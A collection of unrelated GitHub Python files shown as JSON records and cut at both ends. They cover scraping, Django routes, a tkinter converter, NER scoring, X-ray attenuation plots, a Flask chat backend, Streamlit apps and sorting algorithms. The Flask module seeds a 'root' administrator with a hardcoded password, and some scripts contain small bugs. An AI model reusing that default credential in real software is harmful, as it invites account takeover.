'.join(tr.select(\"td\")[0].text.split())\n if th == '住所':\n address = td\n elif th == '電話':\n tel = td\n elif th == '最寄駅':\n station = td\n elif th == '営業時間':\n time = td\n elif th == '定休日':\n holiday = td\n elif th == 'URL':\n url = td\n\n ret = geocoder.google(address).latlng\n if ret:\n latitude, longitude = ret\n else:\n latitude, longitude = [0, 0]\n print(name)\n\n data = {\n 'name': name,\n 'address': address,\n 'tel': tel,\n 'station': station,\n 'time': time,\n 'holiday': holiday,\n 'url': url,\n 'latitude': latitude,\n 'longitude': longitude,\n 'dartslive': dartslive,\n 'information': information\n }\n\n jsonData.append(data)\n\njsonFile = open('json/tokyo_shop.json', 'w')\njson.dump(jsonData, jsonFile)\njsonFile.close()\n","repo_name":"okadakk/darts","sub_path":"scraping/parseShop.py","file_name":"parseShop.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22896866215","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"liabilities\"),\n path(\"add/\", views.add, name=\"liability_add\"),\n path(\"/\", views.detail, name=\"liability_detail\"),\n path(\"/change/\", views.change, name=\"liability_change\"),\n path(\"/delete/\", views.delete, name=\"liability_delete\"),\n\n path(\"creditors/\", include('liabilities.urls_creditors')),\n path(\"withdrawals/\", include('liabilities.urls_withdrawals')),\n]","repo_name":"Paphra/zacchaeus","sub_path":"liabilities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"19535662707","text":"import tkinter as tk\r\n\r\ndef conv_c2f(temp_c):\r\n return temp_c * 1.8 + 32\r\n\r\n\r\ndef c2f():\r\n print(\"clicked!!\")\r\n # 섭씨를 화씨로...\r\n # 섭씨는...? 
입력값은 어디??\r\n # giu_input() 비슷\r\n temp_c = float(ent_temp.get())\r\n temp_f = conv_c2f(temp_c)\r\n print(temp_f)\r\n # 결과는 어디다가 표시??\r\n lbl_result.config(text=f\"{temp_f:.1f}\")\r\n\r\n\r\nwindow = tk.Tk()\r\n\r\nent_frame = tk.Frame(master=window)\r\n\r\nent_temp = tk.Entry(master=ent_frame, width=10)\r\nlbl_temp_c = tk.Label(master=ent_frame, text=\"\\N{DEGREE CELSIUS}\")\r\nbtn_temp = tk.Button(master=ent_frame,\r\n text=\"\\N{RIGHTWARDS BLACK ARROW}\",\r\n command=c2f\r\n )\r\nlbl_result = tk.Label(master=ent_frame, text=\"!!!\")\r\n\r\n\r\ndef main():\r\n\r\n window.title(\"온도 변환 프로그램 v.0.1 by 홍길동\")\r\n window.resizable(width=False, height=False)\r\n window.geometry(\"500x300\")\r\n\r\n\r\n ent_temp.grid(row=0, column=0, sticky=\"e\")\r\n lbl_temp_c.grid(row=0, column=1)\r\n btn_temp.grid(row=0, column=2)\r\n lbl_result.grid(row=0, column=3)\r\n\r\n ent_frame.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n window.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Yanghuiwon22/ppp-hannah","sub_path":"homework19/ex2_temp_conv.py","file_name":"ex2_temp_conv.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27018357696","text":"# -*- coding: utf-8 -*-\nimport sys\n\nimport numpy as np\n\n\ndef lines_to_label_list(input_lines):\n label_list = []\n label = []\n for line in input_lines:\n if len(line) < 2:\n if len(label) > 0:\n label_list.append(label)\n label = []\n else:\n label.append(line.strip().split()[-1])\n return label_list\n\n\n## compare two files by f1-value, input file should be .ann file \n## with format [@word1#entity-type*]word2 word3 ...\n## support nested entity (only use the largest span)\n## already remove segmentation space, i.e. 
character based entity extraction (to avoid segmentation mismatch problem on two files)\ndef compare_files(gold_file, pred_file, up_ignore_layer=0):\n # print \"Compare files...\"\n # print \"Gold file:\", gold_file\n # print \"Pred file:\", pred_file\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, up_ignore_layer)\n\n match_num = len(match_entity)\n gold_num = len(gold_entity)\n pred_num = len(pred_entity)\n return get_final_score(gold_num, pred_num, match_num)\n\n\ndef get_final_score(gold_num, pred_num, match_num):\n if pred_num == 0:\n precision = \"Nan\"\n else:\n precision = (match_num + 0.0) / pred_num\n if gold_num == 0:\n recall = 'Nan'\n else:\n recall = (match_num + 0.0) / gold_num\n if (precision == \"Nan\") or (recall == \"Nan\") or (precision + recall) <= 0.0:\n f_measure = \"Nan\"\n else:\n f_measure = 2 * precision * recall / (precision + recall)\n # print(('Precision: %s/%s = %s')%(match_num, pred_num, precision))\n # print(('Recall: %s/%s = %s')%(match_num, gold_num, recall))\n # print(('F1_value: %s')%(f_measure))\n return precision, recall, f_measure\n\n\ndef get_matched_ner_from_file(gold_file, pred_file, up_ignore_layer=0):\n gold_lines = open(gold_file, encoding='utf-8').readlines()\n pred_lines = open(pred_file, encoding='utf-8').readlines()\n sentence_num = len(gold_lines)\n assert (sentence_num == len(pred_lines))\n gold_entity = []\n pred_entity = []\n match_entity = []\n start_line = 0\n end_line = start_line + 1000000\n for idx in range(sentence_num):\n if idx >= end_line:\n continue\n if idx < start_line:\n continue\n # print gold_lines[idx]\n gold_filter_entity = filter_entity(get_ner_from_sentence(gold_lines[idx]), up_ignore_layer)\n # print \"gold:\", gold_filter_entity\n pred_filter_entity = filter_entity(get_ner_from_sentence(pred_lines[idx]), up_ignore_layer)\n # print \"pred:\",pred_filter_entity\n match = list(set(gold_filter_entity).intersection(set(pred_filter_entity)))\n gold_entity += gold_filter_entity\n pred_entity += pred_filter_entity\n match_entity += match\n return gold_entity, pred_entity, match_entity\n\n\ndef compare_f_measure_by_type(gold_file, pred_file):\n ## generate entity f score by entity type\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, 0)\n gold_type_dict = {}\n pred_type_dict = {}\n match_type_dict = {}\n for entity in gold_entity:\n entity_type = entity.split(':')[1]\n if entity_type in gold_type_dict:\n gold_type_dict[entity_type] += 1\n else:\n gold_type_dict[entity_type] = 1\n for entity in pred_entity:\n entity_type = entity.split(':')[1]\n if entity_type in pred_type_dict:\n pred_type_dict[entity_type] += 1\n else:\n pred_type_dict[entity_type] = 1\n for entity in match_entity:\n entity_type = entity.split(':')[1]\n if entity_type in match_type_dict:\n match_type_dict[entity_type] += 1\n else:\n match_type_dict[entity_type] = 1\n final_prf = []\n for entity in sorted(gold_type_dict.keys()):\n gold_num = gold_type_dict[entity]\n pred_num = 0\n match_num = 0\n if entity in pred_type_dict:\n pred_num = pred_type_dict[entity]\n if entity in match_type_dict:\n match_num = match_type_dict[entity]\n p, r, f = get_final_score(gold_num, pred_num, match_num)\n final_prf.append(entity + \":\" + p_r_f_string(p, r, f))\n over_gold_num = len(gold_entity)\n over_pred_num = len(pred_entity)\n over_match_num = len(match_entity)\n p, r, f = get_final_score(over_gold_num, over_pred_num, over_match_num)\n final_prf.append(\"Overall\" + \":\" + 
p_r_f_string(p, r, f))\n\n ## get f measure for chunk\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, 2)\n over_gold_num = len(gold_entity)\n over_pred_num = len(pred_entity)\n over_match_num = len(match_entity)\n p, r, f = get_final_score(over_gold_num, over_pred_num, over_match_num)\n final_prf.append(\"Chunk\" + \":\" + p_r_f_string(p, r, f))\n return final_prf\n\n\ndef get_ner_from_sentence(sentence):\n ## remove segmentation space, avoid segmentation changes\n sentence = sentence.strip().replace(' ', '')\n sentence_len = len(sentence)\n # print sentence\n entity_start = []\n words = []\n last_char = ''\n entity_type_start = False\n entity_type = ''\n word_id = 0\n entity_list = []\n for idx in range(sentence_len):\n if sentence[idx] == '[':\n left_bracket = True\n elif sentence[idx] == '@':\n if last_char == '[':\n entity_start.append(word_id)\n else:\n words.append(sentence[idx])\n word_id += 1\n elif sentence[idx] == '#':\n if len(entity_start) > 0:\n entity_type_start = True\n else:\n words.append(sentence[idx])\n word_id += 1\n elif sentence[idx] == ']':\n if last_char == '*':\n ## remove inside nested entity\n if len(entity_start) > 1:\n entity_start.pop()\n entity_type = ''\n entity_type_start = False\n elif len(entity_start) == 1:\n entity_info = '[' + str(entity_start[0]) + ',' + str(word_id - 1) + ']:' + entity_type.strip('*')\n entity_list.append(entity_info)\n entity_type = ''\n entity_start = []\n entity_type_start = False\n else:\n words.append(sentence[idx])\n word_id += 1\n else:\n if entity_type_start:\n entity_type += sentence[idx]\n else:\n words.append(sentence[idx])\n word_id += 1\n last_char = sentence[idx]\n # print entity_list\n return entity_list\n # print entity_list\n # for word in words:\n # print word, \" \",\n\n\ndef filter_entity(entity_list, up_ignore_layer=0):\n ## ignore entity type when calculate\n ignore_type = {}\n # ignore_type = {'Fin-Concept'}\n ## rename entity type\n # rename_type = {'Person-Name':'Person'}\n rename_type = {}\n filtered_list = []\n for entity in entity_list:\n pair = entity.split(':')\n entity_type = pair[-1]\n if entity_type not in ignore_type:\n if entity_type in rename_type:\n entity_type = rename_type[entity_type]\n if up_ignore_layer == 1:\n if '-' in entity_type:\n entity_type = entity_type.split('-')[0]\n elif up_ignore_layer == 2:\n entity_type = \"ENTITY\"\n filtered_list.append(pair[0] + ':' + entity_type)\n return filtered_list\n\n\ndef generate_f_value_report():\n file_list = [\n # \"exercise.chenhua.100.ann\",\n \"exercise.yangjie.100.ann\",\n \"exercise.shaolei.100.ann\",\n \"exercise.yuanye.100.ann\",\n # \"exercise.yanxia.100.ann\",\n # \"exercise.yuanye.100.ann\",\n \"exercise.yumin.100.ann\"\n # \"exercise.hongmin.100.ann\",\n # \"exercise.yuze.100.ann\"\n ]\n\n file_num = len(file_list)\n result_matrix = np.ones((file_num, file_num))\n result_matrix_ignore_1_layer = np.ones((file_num, file_num))\n result_matrix_ignore_2_layer = np.ones((file_num, file_num))\n for idx in range(file_num - 1):\n gold_file = file_list[idx]\n for idy in range(idx + 1, file_num):\n pred_file = file_list[idy]\n p, r, f = compare_files(gold_file, pred_file, 0)\n p1, r1, f1 = compare_files(gold_file, pred_file, 1)\n p2, r2, f2 = compare_files(gold_file, pred_file, 2)\n result_matrix[idx][idy] = f\n result_matrix[idy][idx] = f\n result_matrix_ignore_1_layer[idx][idy] = f1\n result_matrix_ignore_1_layer[idy][idx] = f1\n result_matrix_ignore_2_layer[idx][idy] = f2\n 
result_matrix_ignore_2_layer[idy][idx] = f2\n ## show final results\n print(\"FINAL REPORT: all_catagory/ignore_sub_catogary/entity_chunk\")\n print(\"F1-value\".rjust(10), )\n for idx in range(file_num):\n print(simplified_name(file_list[idx]).rjust(15), )\n print()\n for idx in range(file_num):\n print(simplified_name(file_list[idx]).rjust(15), )\n for idy in range(file_num):\n result = output_model(result_matrix[idx][idy], result_matrix_ignore_1_layer[idx][idy],\n result_matrix_ignore_2_layer[idx][idy])\n print(result.rjust(15), )\n print()\n\n\ndef calculate_average(input_array):\n length = input_array.shape[0]\n\n\ndef output_model(number1, number2):\n if number1 != 'Nan' and number1 != 'nan':\n if number1 == 1.0:\n return \" 100/100 \"\n else:\n num1 = str(round(number1 * 100, 1))\n else:\n num1 = str(number1)\n if number2 != 'Nan' and number2 != 'nan':\n if number2 == 1.0:\n num2 = \"100\"\n else:\n num2 = str(round(number2 * 100, 1))\n else:\n num2 = str(number2)\n return num1 + '/' + num2\n\n\ndef number_string(number):\n if number != 'Nan' and number != 'nan':\n return str(round(number * 100, 2))\n else:\n return str(number)\n\n\ndef p_r_f_string(precison, recall, f):\n return number_string(precison) + '/' + number_string(recall) + '/' + number_string(f)\n\n\ndef simplified_name(file_name):\n name = file_name.split('.')[1]\n return name\n\n\ndef generate_report_from_list(file_list):\n file_num = len(file_list)\n result_matrix = np.ones((file_num, file_num))\n result_matrix_boundary = np.ones((file_num, file_num))\n for idx in range(file_num - 1):\n gold_file = file_list[idx]\n for idy in range(idx + 1, file_num):\n pred_file = file_list[idy]\n p, r, f = compare_files(gold_file, pred_file, 0)\n p2, r2, f2 = compare_files(gold_file, pred_file, 2)\n result_matrix[idx][idy] = f\n result_matrix[idy][idx] = f\n result_matrix_boundary[idx][idy] = f2\n result_matrix_boundary[idy][idx] = f2\n final_matrix = []\n\n for idx in range(file_num):\n result_line = []\n for idy in range(file_num):\n result = output_model(result_matrix[idx][idy], result_matrix_boundary[idx][idy])\n result_line.append(result)\n final_matrix.append(result_line)\n return final_matrix\n\n\nif __name__ == '__main__':\n gold_file = \"sample.gold.ann\"\n pred_file = \"sample.pred.ann\"\n if len(sys.argv) > 2:\n compare_files(sys.argv[1], sys.argv[2])\n else:\n generate_f_value_report()\n","repo_name":"jiesutd/YEDDA","sub_path":"utils/metric4ann.py","file_name":"metric4ann.py","file_ext":"py","file_size_in_byte":11529,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"20"} +{"seq_id":"27626671609","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#from tabletext import to_text\nimport xraylib as xrl\nfrom xpecgen import xpecgen as xg\n\ndef GetDensity(material):\n if material=='H2C':\n cpH2C = xrl.GetCompoundDataNISTByName('Polyethylene')\n density = cpH2C['density']\n elif material=='H2O':\n density = 1.\n elif material=='C2F4':\n density = 2.25\n else:\n Z=xrl.SymbolToAtomicNumber(material)\n density = xrl.ElementDensity(Z)\n return density\n\ndef mu(material='H2C'):\n energy_range = np.arange(5.,800., 0.1, dtype=np.double)\n density = GetDensity(material)\n print(f'density {material} = {density}')\n mu_rho = [xrl.CS_Total_CP(material, E) * density for E in energy_range]\n mu_rho_Photo = [xrl.CS_Photo_CP(material, E) * density for E in energy_range]\n mu_rho_Compt = [xrl.CS_Compt_CP(material, E) * density for E in energy_range]\n 
mu_rho_Rayl = [xrl.CS_Rayl_CP(material, E) * density for E in energy_range]\n plt.close(1)\n fig = plt.figure(num=1,dpi=150,clear=True)\n mpl.rcParams.update({'font.size': 6})\n axMW = plt.subplot(111)\n axMW.plot(energy_range, mu_rho,color=\"black\",linewidth=2.,linestyle=\"-\",label='Total')\n axMW.plot(energy_range, mu_rho_Photo,color=\"red\",linewidth=2.,linestyle=\"-\",label='Photoelectric')\n axMW.plot(energy_range, mu_rho_Compt,color=\"blue\",linewidth=2.,linestyle=\"-\",label='Compton')\n axMW.plot(energy_range, mu_rho_Rayl,color=\"green\",linewidth=2.,linestyle=\"-\",label='Rayleigh')\n axMW.set_xscale('log')\n axMW.set_yscale('log')\n axMW.set_xlim(np.min(energy_range),np.max(energy_range))\n axMW.set_ylim(1e-2,1e4)\n plt.legend(loc='center right', frameon=True)\n plt.xlabel('Energy (keV)')\n plt.ylabel(\"Linear attenuation coefficient (cm$^{-1}$)\")\n axMW.grid(which='major', axis='x', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='x', linewidth=0.3, linestyle='-', color='0.75')\n axMW.grid(which='major', axis='y', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='y', linewidth=0.3, linestyle='-', color='0.75')\n axMW.xaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n #axMW.xaxis.set_minor_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n axMW.grid(True)\n #symbol=xrl.AtomicNumberToSymbol(material)\n axMW.set_title(\"%s\" % material, va='bottom')\n #plt.savefig('mu_over_rho_W.pdf', format='PDF')\n text=axMW.text(np.min(energy_range),1e4, \"\", va=\"top\", ha=\"left\")\n def onclick(event):\n energy = np.round(event.xdata*10)*0.1\n energyidx = int(np.where(np.min(np.abs(energy_range-energy))==np.abs(energy_range-energy))[0])\n tx = 'The linear attnuation coefficient of ' + material + ' at %.1f keV is %1.4e cm$^{-1}$\\n(Rayleigh %1.4e cm$^{-1}$, Photoelectric %1.4e cm$^{-1}$, Compton %1.4e cm$^{-1}$)'%(energy,mu_rho[energyidx],mu_rho_Rayl[energyidx],mu_rho_Photo[energyidx],mu_rho_Compt[energyidx])\n text.set_text(tx)\n text.set_x(axMW.get_xlim()[0])\n text.set_y(axMW.get_ylim()[1])\n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show()\n \ndef spectrum(E0,Mat_Z,Mat_X):\n xrs=xg.calculate_spectrum(E0,12,3,100,epsrel=0.5,monitor=None,z=74)\n #Inherent filtration: 1.2mm Al + 100cm Air\n mu_Al=xg.get_mu(13)\n xrs.attenuate(0.12,mu_Al)\n xrs.attenuate(100,xg.get_mu(\"air\"))\n fluence_to_dose=xg.get_fluence_to_dose()\n xrs.set_norm(value=0.146,weight=fluence_to_dose)\n #Attenuation\n if Mat_Z>0: #Atomic number\n dMat = xrl.ElementDensity(Mat_Z)\n fMat = xrl.AtomicNumberToSymbol(Mat_Z)\n xrs.attenuate(0.1*Mat_X,xg.get_mu(Mat_Z))\n else: #-1 == 'Water'\n mH2O = 2. * xrl.AtomicWeight(1) + xrl.AtomicWeight(8)\n wH = 0.1 * Mat_X * 2. 
* xrl.AtomicWeight(1) / (xrl.ElementDensity(1) * mH2O)\n wO = 0.1 * Mat_X * xrl.AtomicWeight(8) / (xrl.ElementDensity(8) * mH2O)\n xrs.attenuate(wH,xg.get_mu(1))\n xrs.attenuate(wO,xg.get_mu(8))\n #Get the figures\n Nr_Photons = \"%.4g\" % (xrs.get_norm())\n Average_Energy = \"%.2f keV\" % (xrs.get_norm(lambda x:x)/xrs.get_norm())\n Dose = \"%.3g mGy\" % (xrs.get_norm(fluence_to_dose))\n HVL_Al=xrs.hvl(0.5,fluence_to_dose,mu_Al)\n HVL_Al_text = \"%.2f mm (Al)\" % (10*HVL_Al)\n a = [[\"Dose at 1m\", Dose],[\"Nr of photons\", Nr_Photons],\n [\"Average energy\",Average_Energy],[\"Half-value Layer\", HVL_Al_text]]\n #print(to_text(a))\n (x2,y2) = xrs.get_points()\n\n\n\n plt.close(2)\n plt.figure(num=2,dpi=150,clear=True)\n mpl.rcParams.update({'font.size': 6})\n axMW = plt.subplot(111)\n axMW.plot(x2,y2)\n axMW.set_xlim(3,E0)\n axMW.set_ylim(0,)\n plt.xlabel(\"Energy [keV]\")\n plt.ylabel(\"Nr of photons per [keV·cm²·mGy] @ 1m\")\n axMW.grid(which='major', axis='x', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='x', linewidth=0.2, linestyle='-', color='0.85')\n axMW.grid(which='major', axis='y', linewidth=0.5, linestyle='-', color='0.75')\n axMW.grid(which='minor', axis='y', linewidth=0.2, linestyle='-', color='0.85')\n axMW.xaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%d\"))\n axMW.yaxis.set_major_formatter(mpl.ticker.FormatStrFormatter(\"%.2g\"))\n axMW.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())\n axMW.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())\n axMW.grid(True)\n plt.show()","repo_name":"effepivi/gvxr-demos","sub_path":"training-course/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"71140653169","text":"from flask import Flask, render_template, url_for, redirect, session, request, make_response\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport os\nimport base64\nfrom .path import get_project_root\n\napp = Flask(__name__, template_folder='../templates', static_folder='../static')\nconfig_file = os.path.join(get_project_root(), 'conf/allchat.cfg')\napp.config.from_pyfile(config_file, silent = True)\nsk_file = os.path.join(get_project_root(), 'conf/seckey')\nif not os.path.exists(sk_file):\n raw_key = os.urandom(32)\n with open(sk_file, 'wb') as f:\n f.write(raw_key)\nelse:\n with open(sk_file, 'rb') as f:\n raw_key = f.read()\napp.secret_key = base64.b64encode(raw_key).decode()\n\ndb = SQLAlchemy(app, session_options={'autoflush':False, 'expire_on_commit':False, \\\n 'autocommit':True})\nuser_states = dict()\n\n# from allchat.database.sql import get_session\nfrom allchat.database import init_db\nfrom allchat.database.models import UserAuth, UserInfo\nfrom allchat.authentication import authorized\nfrom allchat.administrator import views\nfrom allchat import messages\nfrom allchat.amqp import init_rpc\nfrom allchat import accounts\nfrom allchat import filestore\nfrom allchat import friends\nfrom allchat import groups\nfrom allchat import login\nfrom allchat import records\nfrom allchat import versions\n\napp.register_blueprint(versions.version)\napp.register_blueprint(accounts.account, url_prefix = '/v1')\napp.register_blueprint(login.login, url_prefix = '/v1')\napp.register_blueprint(friends.friend, url_prefix = '/v1')\napp.register_blueprint(groups.group, url_prefix = '/v1')\napp.register_blueprint(messages.message, url_prefix = '/v1')\napp.register_blueprint(filestore.filestore, 
url_prefix = '/v1')\napp.register_blueprint(records.record, url_prefix = '/v1')\n\ndef init_admin():\n user = db.session.query(UserInfo).filter_by(username='root').first()\n if user is None:\n admin = UserInfo(\"root\", \"XXX@XXX.XXX\")\n auth = UserAuth(\"root\", \"passw0rd\")\n db.session.begin()\n try:\n db.session.add(admin)\n db.session.add(auth)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n raise e\n#@app.before_first_request\ndef init():\n init_db()\n init_admin()\n init_rpc()\n \n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session = get_session()\n# if db_session is not None:\n# db_session.remove()\n\n@app.route('/', methods = ['GET'])\n@app.route('/index.html', methods = ['GET'])\ndef index():\n # db_session = db.session\n try:\n account = session['account']\n # token = request.headers['token']\n # auth = db_session.query(UserAuth).filter(db.and_(UserAuth.account == account, \\\n # UserAuth.deleted == False)).one()\n except Exception as e:\n return redirect(url_for('login'))\n else:\n # if not auth.is_token(token) or auth.is_token_timeout():\n # return redirect(url_for('login'))\n # else:\n resp = make_response(render_template('index.html'))\n return resp\n\n@app.route('/login.html', methods = ['GET'])\ndef login():\n return render_template('login.html')\n\n@app.route('/register.html', methods = ['GET'])\ndef signup():\n return render_template('register.html')\n","repo_name":"AllChat/AllChat","sub_path":"allchat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"31600304725","text":"import streamlit as st\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\ndef create_task(count=3):\n texts=[]\n for i in range(count):\n text=[]\n text.append(st.sidebar.text_input(\"task\"+str(i+1), \"task\"+str(i+1)))\n slider=st.sidebar.slider(\"task\"+str(i+1)+\"の脳内比率\", 0, 10, 5)\n text=text*slider\n text=\" \".join(text)\n texts.append(text)\n return texts\n\ndef add_task(count):\n add_texts=[]\n for i in range(3, count+3):\n text=[]\n text.append(st.sidebar.text_input(\"task\"+str(i+1), \"task\"+str(i+1)))\n slider=st.sidebar.slider(\"task\"+str(i+1)+\"の脳内比率\", 0, 10, 5)\n text=text*slider\n text=\" \".join(text)\n add_texts.append(text)\n return add_texts\n\n\nst.title(\"脳内のタスクを整理しよう!\")\nst.sidebar.write(\"\"\"脳内比率が大きいtaskほど \n画像に強調されて表示されるよ!\"\"\")\nst.sidebar.write(\"taskを入力してね\")\n\ntexts=create_task()\ntexts=\" \".join(texts)\n\ninput_count=st.sidebar.number_input(\"追加するtaskの数を入力してください\", 0, 20)\nif input_count:\n add_texts=add_task(input_count)\n add_texts=\" \".join(add_texts)\n texts+=\" \"+add_texts\n\nfont_path=\"./ipaexg.ttf\"\nwc=WordCloud(width=1280, height=720, background_color=\"white\", font_path=font_path)\nwc.generate(texts)\n\nplt.axis(\"off\")\nplt.tight_layout()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nplt.imshow(wc, interpolation='bilinear')\nst.pyplot()\n","repo_name":"nanaho-mu/wordCloud-streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34879532907","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nfrom PIL import Image,ImageOps\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\nfrom imp import 
load_compiled\n\nimport json\nimport requests\nfrom streamlit_lottie import st_lottie\n\n\nmodel=load_model('cnn_model_65eps.h5')\n\nst.title(\"Brain tumer classification\",)\nst.header(\"Insert ur mri image\",)\ndef load_lottieurl(url:str):\n r=requests.get(url)\n if r.status_code !=200:\n return None\n return r.json()\nst.set_option('deprecation.showfileUploaderEncoding', False)\nfile_upload=st.file_uploader(\"Choose the mri file\",type=['jpg','png','jpeg'])\nif file_upload is None:\n lottie_coding=load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_iarc855d.json\")\n st_lottie(lottie_coding,height=100,width=100,key=None)\n st.write(\"you haven't put any images yet!\")\nelse: \n image = Image.open(file_upload)\n size=(227,227)\n image=ImageOps.fit(image,size,Image.ANTIALIAS)\n img=np.asarray(image)\n img_reshape=img[np.newaxis,...]\n st.image(img_reshape, caption='your mri image')\n prediction=model.predict(img_reshape)\n class_names=['glioma','meningioma','notumor','pituitary']\n string=class_names[np.argmax(prediction)]\n st.write(\"you have \",string)\n\n\nexpander=st.expander(\" you can also check symptons of tumor\")\nwith expander:\n option=st.selectbox('Select your tumor_type',('glioma_tumor','meningioma_tumor','pituitary_tumor'))\n st.write('You have selected',option)\n if option=='glioma_tumor':\n st.write(\"\"\"\n Common symptoms of Gliomas:Headache.\n Nausea or vomiting.\n Confusion or a decline in brain function.\n Memory loss.\n Personality changes or irritability.\n Difficulty with balance.\n Urinary incontinence.\n Vision problems, such as blurred vision, double vision or loss of peripheral vision\n \"\"\")\n elif option=='meningioma_tumor':\n st.write (\"\"\"Common symptoms of Meningioma_tumor:\n Changes in vision, such as seeing double or blurriness.\n Headaches, especially those that are worse in the morning.\n Hearing loss or ringing in the ears.\n Memory loss.\n Loss of smell.\n Seizures.\n Weakness in your arms or legs.\n Language difficulty.\"\"\") \n elif option=='pituitary_tumor':\n st.write(\"\"\" Common symptonms of pituitary_tumor:\n Nausea and vomiting.\n Weakness.\n Feeling cold.\n Less frequent or no menstrual periods.\n Sexual dysfunction.\n Increased amount of urine.\n Unintended weight loss or gain.\"\"\")\n else :\n st.write('please select')\nwith st.sidebar: \n st.success('Developed by INTEL AI')\n lottie_contact=load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_zj3qnsfs.json\")\n st.write(\"\"\"If you have any issues contact us\n thanthtoosan.mechatronic@gmail.com\"\"\")\n st_lottie(lottie_contact,height=60,width=60,key=None)\n\n \n","repo_name":"thant-san/project_mri","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7441473812","text":"import random\nimport time\nimport math\nimport sys\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef CreatePlot(input_data, exec_time, algo_name):\n plt.xlabel('Ulaz [n]')\n plt.ylabel('Vreme [ms]')\n plt.plot(input_data, exec_time, '-', label = algo_name)\n plt.legend()\n print(algo_name)\n for i in range(0, len(input_data)):\n print(\"input_data: \", input_data[i], \", exec_time: \", exec_time[i])\n\n\ndef RandomList(min, max, elements):\n list = random.sample(range(min, max), elements)\n return list\n\n\ndef SelectionSort(Array):\n for i in range(len(Array) - 1):\n minEl = i\n for j in range(i + 1, len(Array)):\n 
if(Array[j] < Array[minEl]):\n minEl = j\n Array[minEl], Array[i] = Array[i], Array[minEl]\n\ndef SortedTest(Array):\n testList = Array[:]\n testList.sort()\n if testList == Array:\n return True\n return False\n\n\ndef TestAndPlotAlgorithm(Algorithm):\n algo_name = Algorithm.__name__\n test_ranges = [10,100,1000,10000]\n input_data = []\n exec_time = []\n for n in test_ranges:\n Array = RandomList(0, 1000000 + 1, n)\n start_time = time.clock()\n Algorithm(Array)\n end_time = time.clock()\n exec_time.append((end_time - start_time))\n input_data.append(n)\n if(SortedTest):\n CreatePlot(input_data, exec_time, algo_name)\n\ndef Parent(i):\n return (i - 1) // 2\n\n\ndef Left(i):\n return 2 * i + 1\n\n\ndef Right(i):\n return 2 * i + 2\n\ndef MaxHeapify(Array, i):\n l = Left(i)\n r = Right(i)\n if l < heap_size and Array[l] > Array[i]:\n largest = l\n else:\n largest = i\n if r < heap_size and Array[r] > Array[largest]:\n largest = r\n if largest != i:\n Array[i], Array[largest] = Array[largest], Array[i]\n MaxHeapify(Array, largest)\n\n\ndef BuildMaxHeap(Array):\n global heap_size\n heap_size = len(Array)\n itterate = len(Array) // 2 - 1\n for i in range(itterate, -1, -1):\n MaxHeapify(Array, i)\n\n\ndef HeapSort(Array):\n global heap_size\n BuildMaxHeap(Array)\n for i in range(len(Array) - 1, 0, -1):\n Array[0], Array[i] = Array[i], Array[0]\n heap_size -= 1\n MaxHeapify(Array, 0)\n\n\ndef countingSort(arr, exp1):\n n = len(arr)\n # The output array elements that will have sorted arr\n output = [0] * (n)\n # initialize count array as 0\n count = [0] * (10)\n # Store count of occurrences in count[]\n for i in range(0, n):\n index = (arr[i]/exp1)\n count[ int((index)%10) ] += 1\n # Change count[i] so that count[i] now contains actual\n # position of this digit in output array\n for i in range(1,10):\n count[i] += count[i-1]\n \n # Build the output array\n i = n-1\n while i>=0:\n index = (arr[i]/exp1)\n output[ count[ int((index)%10) ] - 1] = arr[i]\n count[ int((index)%10) ] -= 1\n i -= 1\n \n # Copying the output array to arr[],\n # so that arr now contains sorted numbers\n i = 0\n for i in range(0,len(arr)):\n arr[i] = output[i]\n \n# Method to do Radix Sort\ndef radixSort(arr):\n \n # Find the maximum number to know number of digits\n max1 = max(arr)\n \n # Do 